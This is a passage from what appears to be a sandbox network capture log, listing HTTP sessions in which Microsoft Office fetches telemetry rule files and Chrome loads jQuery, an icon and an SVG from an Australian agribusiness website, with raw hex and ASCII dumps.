                                                                                                                                    2024-11-05 08:03:24 UTC1369INData Raw: 64 2c 20 75 73 65 20 61 20 63 6f 6d 6d 61 20 28 2c 29 20 69 6e 73 74 65 61 64 2e 22 29 3b 76 61 72 20 74 3d 2f 5c 73 2a 2c 5c 73 2a 7c 5c 73 2b 2f 3b 66 3d 2d 31 21 3d 3d 67 3f 5b 66 2e 73 6c 69 63 65 28 30 2c 67 29 2e 63 6f 6e 63 61 74 28 5b 66 5b 67 5d 2e 73 70 6c 69 74 28 74 29 5b 30 5d 5d 29 2c 0a 5b 66 5b 67 5d 2e 73 70 6c 69 74 28 74 29 5b 31 5d 5d 2e 63 6f 6e 63 61 74 28 66 2e 73 6c 69 63 65 28 67 2b 31 29 29 5d 3a 5b 66 5d 3b 72 65 74 75 72 6e 28 66 3d 66 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 41 2c 44 29 7b 76 61 72 20 4e 3d 28 31 3d 3d 3d 44 3f 21 70 3a 70 29 3f 22 68 65 69 67 68 74 22 3a 22 77 69 64 74 68 22 2c 47 3d 21 31 3b 72 65 74 75 72 6e 20 41 2e 72 65 64 75 63 65 28 66 75 6e 63 74 69 6f 6e 28 4a 2c 55 29 7b 72 65 74 75 72 6e 22 22 3d
                                                                                                                                    Data Ascii: d, use a comma (,) instead.");var t=/\s*,\s*|\s+/;f=-1!==g?[f.slice(0,g).concat([f[g].split(t)[0]]),[f[g].split(t)[1]].concat(f.slice(g+1))]:[f];return(f=f.map(function(A,D){var N=(1===D?!p:p)?"height":"width",G=!1;return A.reduce(function(J,U){return""=


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    121192.168.2.44989413.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:24 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:24 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 407
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                    ETag: "0x8DC582B9D30478D"
                                                                                                                                    x-ms-request-id: 8b11e52e-a01e-000d-655f-2ed1ea000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080324Z-157b9fd754frph49hC1SN1dtxw00000004bg0000000011dq
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:24 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    122192.168.2.449895162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:24 UTC634OUTGET /etc.clientlibs/clientlibs/granite/jquery.lc-f9e8e8c279baf6a1a278042afe4f395a-lc.min.js HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:24 UTC624INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:24 GMT
                                                                                                                                    Content-Type: application/javascript;charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    Cache-Control: public, max-age=2592000, immutable
                                                                                                                                    last-modified: Tue, 05 Nov 2024 07:52:29 GMT
                                                                                                                                    etag: W/"18d32-2386f26fb1bdc0-gzip"
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    Age: 654
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-dfw-kdfw8210143-DFW
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-timer: S1730793149.173545,VS0,VS0,VE863
                                                                                                                                    vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53bfdda683a7-DFW
                                                                                                                                    2024-11-05 08:03:24 UTC745INData Raw: 37 64 32 65 0d 0a 2f 2a 0a 20 6a 51 75 65 72 79 20 4a 61 76 61 53 63 72 69 70 74 20 4c 69 62 72 61 72 79 20 76 31 2e 31 32 2e 34 2d 61 65 6d 0a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 2e 63 6f 6d 2f 0a 0a 20 49 6e 63 6c 75 64 65 73 20 53 69 7a 7a 6c 65 2e 6a 73 0a 20 68 74 74 70 3a 2f 2f 73 69 7a 7a 6c 65 6a 73 2e 63 6f 6d 2f 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 0a 20 44 61 74 65 3a 20 32 30 31 36 2d 30 35 2d 32 30 54 31 37 3a 31 37 5a 0a 20 53 69 7a 7a 6c
                                                                                                                                    Data Ascii: 7d2e/* jQuery JavaScript Library v1.12.4-aem http://jquery.com/ Includes Sizzle.js http://sizzlejs.com/ Copyright jQuery Foundation and other contributors Released under the MIT license http://jquery.org/license Date: 2016-05-20T17:17Z Sizzl
                                                                                                                                    2024-11-05 08:03:24 UTC1369INData Raw: 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 69 74 68 20 61 20 64 6f 63 75 6d 65 6e 74 22 29 3b 72 65 74 75 72 6e 20 6e 61 28 6a 61 29 7d 3a 6e 61 28 79 29 7d 29 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 79 2c 6e 61 29 7b 66 75 6e 63 74 69 6f 6e 20 6a 61 28 61 29 7b 76 61 72 20 62 3d 21 21 61 26 26 22 6c 65 6e 67 74 68 22 69 6e 20 61 26 26 61 2e 6c 65 6e 67 74 68 2c 64 3d 63 2e 74 79 70 65 28 61 29 3b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 64 7c 7c 63 2e 69 73 57 69 6e 64 6f 77 28 61 29 3f 21 31 3a 22 61 72 72 61 79 22 3d 3d 3d 64 7c 7c 30 3d 3d 3d 62 7c 7c 22 6e 75 6d 62 65 72 22 3d 3d 3d 74 79
                                                                                                                                    Data Ascii: "jQuery requires a window with a document");return na(ja)}:na(y)})("undefined"!==typeof window?window:this,function(y,na){function ja(a){var b=!!a&&"length"in a&&a.length,d=c.type(a);return"function"===d||c.isWindow(a)?!1:"array"===d||0===b||"number"===ty
                                                                                                                                    2024-11-05 08:03:24 UTC1369INData Raw: 21 30 7d 0a 66 75 6e 63 74 69 6f 6e 20 53 62 28 61 2c 62 2c 64 2c 65 29 7b 69 66 28 58 61 28 61 29 29 7b 76 61 72 20 66 3d 63 2e 65 78 70 61 6e 64 6f 2c 67 3d 61 2e 6e 6f 64 65 54 79 70 65 2c 6b 3d 67 3f 63 2e 63 61 63 68 65 3a 61 2c 6d 3d 67 3f 61 5b 66 5d 3a 61 5b 66 5d 26 26 66 3b 69 66 28 6d 26 26 6b 5b 6d 5d 26 26 28 65 7c 7c 6b 5b 6d 5d 2e 64 61 74 61 29 7c 7c 76 6f 69 64 20 30 21 3d 3d 64 7c 7c 22 73 74 72 69 6e 67 22 21 3d 3d 74 79 70 65 6f 66 20 62 29 7b 6d 7c 7c 28 6d 3d 67 3f 61 5b 66 5d 3d 76 61 2e 70 6f 70 28 29 7c 7c 63 2e 67 75 69 64 2b 2b 3a 66 29 3b 6b 5b 6d 5d 7c 7c 28 6b 5b 6d 5d 3d 67 3f 7b 7d 3a 7b 74 6f 4a 53 4f 4e 3a 63 2e 6e 6f 6f 70 7d 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 62 7c 7c 22 66 75 6e 63 74
                                                                                                                                    Data Ascii: !0}function Sb(a,b,d,e){if(Xa(a)){var f=c.expando,g=a.nodeType,k=g?c.cache:a,m=g?a[f]:a[f]&&f;if(m&&k[m]&&(e||k[m].data)||void 0!==d||"string"!==typeof b){m||(m=g?a[f]=va.pop()||c.guid++:f);k[m]||(k[m]=g?{}:{toJSON:c.noop});if("object"===typeof b||"funct
                                                                                                                                    2024-11-05 08:03:24 UTC1369INData Raw: 69 73 74 20 64 65 74 61 69 6c 73 20 64 69 61 6c 6f 67 20 66 69 67 63 61 70 74 69 6f 6e 20 66 69 67 75 72 65 20 66 6f 6f 74 65 72 20 68 65 61 64 65 72 20 68 67 72 6f 75 70 20 6d 61 69 6e 20 6d 61 72 6b 20 6d 65 74 65 72 20 6e 61 76 20 6f 75 74 70 75 74 20 70 69 63 74 75 72 65 20 70 72 6f 67 72 65 73 73 20 73 65 63 74 69 6f 6e 20 73 75 6d 6d 61 72 79 20 74 65 6d 70 6c 61 74 65 20 74 69 6d 65 20 76 69 64 65 6f 22 2e 73 70 6c 69 74 28 22 20 22 29 3b 61 3d 0a 61 2e 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 28 29 3b 69 66 28 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 29 66 6f 72 28 3b 62 2e 6c 65 6e 67 74 68 3b 29 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 62 2e 70 6f 70 28 29 29 3b 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f
                                                                                                                                    Data Ascii: ist details dialog figcaption figure footer header hgroup main mark meter nav output picture progress section summary template time video".split(" ");a=a.createDocumentFragment();if(a.createElement)for(;b.length;)a.createElement(b.pop());return a}functio
                                                                                                                                    2024-11-05 08:03:24 UTC1369INData Raw: 64 28 71 29 3b 63 2e 6d 65 72 67 65 28 51 2c 6d 2e 63 68 69 6c 64 4e 6f 64 65 73 29 3b 66 6f 72 28 6d 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 22 22 3b 6d 2e 66 69 72 73 74 43 68 69 6c 64 3b 29 6d 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 6d 2e 66 69 72 73 74 43 68 69 6c 64 29 3b 6d 3d 42 2e 6c 61 73 74 43 68 69 6c 64 7d 65 6c 73 65 20 51 2e 70 75 73 68 28 62 2e 63 72 65 61 74 65 54 65 78 74 4e 6f 64 65 28 6b 29 29 3b 6d 26 26 42 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 6d 29 3b 7a 2e 61 70 70 65 6e 64 43 68 65 63 6b 65 64 7c 7c 63 2e 67 72 65 70 28 65 61 28 51 2c 22 69 6e 70 75 74 22 29 2c 55 63 29 3b 66 6f 72 28 4c 3d 30 3b 6b 3d 51 5b 4c 2b 2b 5d 3b 29 69 66 28 65 26 26 2d 31 3c 63 2e 69 6e 41 72 72 61 79 28 6b 2c 65 29 29 66 26 26 66 2e 70 75 73 68 28 6b 29
                                                                                                                                    Data Ascii: d(q);c.merge(Q,m.childNodes);for(m.textContent="";m.firstChild;)m.removeChild(m.firstChild);m=B.lastChild}else Q.push(b.createTextNode(k));m&&B.removeChild(m);z.appendChecked||c.grep(ea(Q,"input"),Uc);for(L=0;k=Q[L++];)if(e&&-1<c.inArray(k,e))f&&f.push(k)
                                                                                                                                    2024-11-05 08:03:24 UTC1369INData Raw: 2e 65 76 65 6e 74 73 3b 69 66 28 67 29 66 6f 72 28 64 20 69 6e 20 64 65 6c 65 74 65 20 61 2e 68 61 6e 64 6c 65 2c 61 2e 65 76 65 6e 74 73 3d 7b 7d 2c 67 29 66 6f 72 28 66 3d 30 2c 65 3d 67 5b 64 5d 2e 6c 65 6e 67 74 68 3b 66 3c 65 3b 66 2b 2b 29 63 2e 65 76 65 6e 74 2e 61 64 64 28 62 2c 64 2c 67 5b 64 5d 5b 66 5d 29 3b 61 2e 64 61 74 61 26 26 28 61 2e 64 61 74 61 3d 63 2e 65 78 74 65 6e 64 28 7b 7d 2c 61 2e 64 61 74 61 29 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 47 61 28 61 2c 62 2c 64 2c 65 29 7b 62 3d 65 63 2e 61 70 70 6c 79 28 5b 5d 2c 62 29 3b 76 61 72 20 66 2c 67 3d 30 2c 6b 3d 61 2e 6c 65 6e 67 74 68 2c 6d 3d 6b 2d 31 2c 70 3d 62 5b 30 5d 2c 71 3d 63 2e 69 73 46 75 6e 63 74 69 6f 6e 28 70 29 3b 69 66 28 71 7c 7c 31 3c 6b 26 26 22 73 74 72 69 6e 67 22 3d
                                                                                                                                    Data Ascii: .events;if(g)for(d in delete a.handle,a.events={},g)for(f=0,e=g[d].length;f<e;f++)c.event.add(b,d,g[d][f]);a.data&&(a.data=c.extend({},a.data))}}function Ga(a,b,d,e){b=ec.apply([],b);var f,g=0,k=a.length,m=k-1,p=b[0],q=c.isFunction(p);if(q||1<k&&"string"=
                                                                                                                                    2024-11-05 08:03:24 UTC1369INData Raw: 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 7c 7c 59 61 5b 30 5d 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 29 2e 64 6f 63 75 6d 65 6e 74 2c 62 2e 77 72 69 74 65 28 29 2c 62 2e 63 6c 6f 73 65 28 29 2c 64 3d 67 63 28 61 2c 62 29 2c 59 61 2e 64 65 74 61 63 68 28 29 29 2c 68 63 5b 61 5d 3d 64 29 3b 72 65 74 75 72 6e 20 64 7d 66 75 6e 63 74 69 6f 6e 20 77 62 28 61 2c 0a 62 29 7b 72 65 74 75 72 6e 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 61 28 29 29 64 65 6c 65 74 65 20 74 68 69 73 2e 67 65 74 3b 65 6c 73 65 20 72 65 74 75 72 6e 28 74 68 69 73 2e 67 65 74 3d 62 29 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 69 63 28 61 29 7b 69 66 28 61 20 69 6e 20 6a 63 29 72 65 74 75 72 6e 20 61 3b 66
                                                                                                                                    Data Ascii: contentWindow||Ya[0].contentDocument).document,b.write(),b.close(),d=gc(a,b),Ya.detach()),hc[a]=d);return d}function wb(a,b){return{get:function(){if(a())delete this.get;else return(this.get=b).apply(this,arguments)}}}function ic(a){if(a in jc)return a;f
                                                                                                                                    2024-11-05 08:03:24 UTC1369INData Raw: 3d 3d 66 29 7b 66 3d 49 61 28 61 2c 62 2c 67 29 3b 69 66 28 30 3e 66 7c 7c 6e 75 6c 6c 3d 3d 66 29 66 3d 61 2e 73 74 79 6c 65 5b 62 5d 3b 69 66 28 64 62 2e 74 65 73 74 28 66 29 29 72 65 74 75 72 6e 20 66 3b 65 3d 6b 26 26 28 7a 2e 62 6f 78 53 69 7a 69 6e 67 52 65 6c 69 61 62 6c 65 28 29 7c 7c 66 3d 3d 3d 61 2e 73 74 79 6c 65 5b 62 5d 29 3b 66 3d 70 61 72 73 65 46 6c 6f 61 74 28 66 29 7c 7c 30 7d 72 65 74 75 72 6e 20 66 2b 6e 63 28 61 2c 62 2c 64 7c 7c 28 6b 3f 22 62 6f 72 64 65 72 22 3a 22 63 6f 6e 74 65 6e 74 22 29 2c 65 2c 67 29 2b 22 70 78 22 7d 66 75 6e 63 74 69 6f 6e 20 68 61 28 61 2c 62 2c 64 2c 65 2c 66 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 68 61 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 69 74 28 61 2c 62 2c 64 2c 65 2c 66 29 7d 66 75 6e 63 74 69 6f
                                                                                                                                    Data Ascii: ==f){f=Ia(a,b,g);if(0>f||null==f)f=a.style[b];if(db.test(f))return f;e=k&&(z.boxSizingReliable()||f===a.style[b]);f=parseFloat(f)||0}return f+nc(a,b,d||(k?"border":"content"),e,g)+"px"}function ha(a,b,d,e,f){return new ha.prototype.init(a,b,d,e,f)}functio
                                                                                                                                    2024-11-05 08:03:24 UTC1369INData Raw: 5b 5d 2c 63 72 65 61 74 65 54 77 65 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 71 2c 74 29 7b 71 3d 63 2e 54 77 65 65 6e 28 61 2c 70 2e 6f 70 74 73 2c 71 2c 74 2c 70 2e 6f 70 74 73 2e 73 70 65 63 69 61 6c 45 61 73 69 6e 67 5b 71 5d 7c 7c 70 2e 6f 70 74 73 2e 65 61 73 69 6e 67 29 3b 70 2e 74 77 65 65 6e 73 2e 70 75 73 68 28 71 29 3b 72 65 74 75 72 6e 20 71 7d 2c 73 74 6f 70 3a 66 75 6e 63 74 69 6f 6e 28 71 29 7b 76 61 72 20 74 3d 30 2c 76 3d 71 3f 70 2e 74 77 65 65 6e 73 2e 6c 65 6e 67 74 68 3a 30 3b 69 66 28 65 29 72 65 74 75 72 6e 20 74 68 69 73 3b 66 6f 72 28 65 3d 21 30 3b 74 3c 76 3b 74 2b 2b 29 70 2e 74 77 65 65 6e 73 5b 74 5d 2e 72 75 6e 28 31 29 3b 71 3f 28 6b 2e 6e 6f 74 69 66 79 57 69 74 68 28 61 2c 5b 70 2c 31 2c 30 5d 29 2c 6b 2e 72 65 73 6f 6c 76 65
                                                                                                                                    Data Ascii: [],createTween:function(q,t){q=c.Tween(a,p.opts,q,t,p.opts.specialEasing[q]||p.opts.easing);p.tweens.push(q);return q},stop:function(q){var t=0,v=q?p.tweens.length:0;if(e)return this;for(e=!0;t<v;t++)p.tweens[t].run(1);q?(k.notifyWith(a,[p,1,0]),k.resolve
                                                                                                                                    2024-11-05 08:03:24 UTC1369INData Raw: 65 78 74 65 6e 64 28 21 30 2c 61 2c 64 29 3b 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 61 64 28 61 29 7b 69 66 28 21 63 2e 63 6f 6e 74 61 69 6e 73 28 61 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 43 2c 61 29 29 72 65 74 75 72 6e 21 30 3b 0a 66 6f 72 28 3b 61 26 26 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 3b 29 7b 69 66 28 22 6e 6f 6e 65 22 3d 3d 3d 28 61 2e 73 74 79 6c 65 26 26 61 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 7c 7c 63 2e 63 73 73 28 61 2c 22 64 69 73 70 6c 61 79 22 29 29 7c 7c 22 68 69 64 64 65 6e 22 3d 3d 3d 61 2e 74 79 70 65 29 72 65 74 75 72 6e 21 30 3b 61 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 7a 62 28 61 2c 62 2c 64 2c 65 29 7b 76 61 72 20 66 3b 69 66 28 63 2e 69
                                                                                                                                    Data Ascii: extend(!0,a,d);return a}function ad(a){if(!c.contains(a.ownerDocument||C,a))return!0;for(;a&&1===a.nodeType;){if("none"===(a.style&&a.style.display||c.css(a,"display"))||"hidden"===a.type)return!0;a=a.parentNode}return!1}function zb(a,b,d,e){var f;if(c.i


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    123192.168.2.449903162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:24 UTC520OUTGET /content/dam/eld/icons---logos/icons/icon_farm_supplies.png HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CvVersion%7C5.5.0
                                                                                                                                    2024-11-05 08:03:24 UTC710INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:24 GMT
                                                                                                                                    Content-Type: image/png
                                                                                                                                    Content-Length: 443
                                                                                                                                    Connection: close
                                                                                                                                    last-modified: Wed, 08 Feb 2023 05:11:19 GMT
                                                                                                                                    etag: "0x8DB0992E9D1A95B"
                                                                                                                                    content-disposition: attachment; filename="icon_farm_supplies.png"; filename*=UTF-8''icon_farm_supplies.png
                                                                                                                                    access-control-allow-origin: *
                                                                                                                                    Cache-Control: public, max-age=86400, immutable
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    x-vhost: publish
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-lax-kwhp1940101-LAX
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-timer: S1721956918.168810,VS0,VS0,VE1195
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 1
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53c08b11ead9-DFW
                                                                                                                                    2024-11-05 08:03:24 UTC443INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1e 00 00 00 1e 08 06 00 00 00 3b 30 ae a2 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 01 6d 49 44 41 54 48 89 ed 97 cd 4d c4 30 10 85 1f 88 7b e8 c0 7b c9 31 da 74 00 1d b0 1d 40 09 5b c2 96 40 07 50 02 1d b0 74 b0 28 c7 5c 36 1d 2c 15 04 8d 34 2b 45 de 79 8e 3d 90 0b e2 49 51 94 f8 e7 b3 c7 33 63 fb 6a 1c 47 78 d4 85 ba 95 66 cd d0 1f 3c ed 29 b8 0b f5 2d 80 1d 80 56 7f ed 01 1c f4 7b 0b a0 d2 ff 83 d6 3b 01 b8 9f d4 7f 6b 86 fe 99 81 6f 66 06 f6 34 01 dc 91 3a 01 c0 0b 29 a3 e0 6b 56 d0 0c bd cc 60 33 33 30 a6 2f 1d 34 15 05 ab 36 da 49 a9 ce 66 77 83 db 89 a9 4b 14 26 6b ed 02 ef 1c 50 a8 95 92 6d 97 02 57 ea f9 54 a9 70 92 35 7a 77 82 a1 b3 5e a9 93 5e 28 35 e3 a4 57 66
                                                                                                                                    Data Ascii: PNGIHDR;0pHYs~mIDATHM0{{1t@[@Pt(\6,4+Ey=IQ3cjGxf<)-V{;kof4:)kV`330/46IfwK&kPmWTp5zw^^(5Wf


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    124192.168.2.449902162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:24 UTC548OUTGET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-chevron-left.svg HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CvVersion%7C5.5.0
                                                                                                                                    2024-11-05 08:03:24 UTC587INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:24 GMT
                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    Cache-Control: public, max-age=86400
                                                                                                                                    last-modified: Tue, 29 Oct 2024 09:12:43 GMT
                                                                                                                                    etag: W/"1fe-62599fcdf98c0-gzip"
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-lax-kwhp1940147-LAX
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-timer: S1730212281.434392,VS0,VS0,VE732
                                                                                                                                    vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 56971
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53c08f054796-DFW
                                                                                                                                    2024-11-05 08:03:24 UTC517INData Raw: 31 66 65 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 32 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 32 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 31 31 2e 31 34 35 34 20 30 2e 32 32 32 32 31 38 43 31 31 2e 33 36 34 32 20 30 2e 32 32 32 32 31 38 20 31 31 2e 35 38 32 36 20 30 2e 33 30 32 35 36 35 20 31 31 2e 37 34 39 37 20 30 2e 34 36 33 36 37 33 43 31 32 2e 30 38 33 34 20 30 2e 37 38 35 34 37 35 20 31 32 2e 30 38 33 34 20 31 2e 33 30 37 31 32 20 31 31 2e 37 34 39 37 20 31 2e 36 32 38 39 32 4c 32 2e 39 35 32 30 37 20 31 30 2e 31 31 31 32 4c 31 31 2e 37 34 39 37 20 31 38 2e
                                                                                                                                    Data Ascii: 1fe<svg width="12" height="20" viewBox="0 0 12 20" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M11.1454 0.222218C11.3642 0.222218 11.5826 0.302565 11.7497 0.463673C12.0834 0.785475 12.0834 1.30712 11.7497 1.62892L2.95207 10.1112L11.7497 18.
